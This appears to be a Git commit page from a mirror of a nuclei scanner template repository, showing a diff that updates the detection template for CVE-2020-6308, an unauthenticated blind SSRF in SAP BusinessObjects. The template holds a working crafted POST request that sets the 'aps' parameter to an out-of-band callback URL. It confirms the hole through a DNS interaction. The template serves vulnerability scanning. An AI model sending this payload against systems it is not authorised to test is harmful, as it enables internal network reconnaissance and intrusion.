daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #5728 from tess-ss/patch-27 

Update CVE-2020-6308.yaml
patch-1
Prince Chaddha 2022-10-28 19:26:26 +05:30 committed by GitHub
parent 30ed580cee fe8a9c5cfe
commit c9ec5578c8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
cves/2020/CVE-2020-6308.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2020-6308
info:
name: Unauthenticated Blind SSRF in SAP
name: SAP - Unauthenticated Blind SSRF
author: madrobot
severity: medium
description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
description: |
SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
reference:
- https://github.com/InitRoot/CVE-2020-6308-PoC
- https://launchpad.support.sap.com/#/notes/2943844
@ -14,17 +15,25 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-6308
cwe-id: CWE-918
tags: cve,cve2020,sap,ssrf,oast,blind
tags: cve,cve2020,sap,ssrf,oast,unauth
requests:
- method: POST
path:
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
- raw:
- |
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: location
words:
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"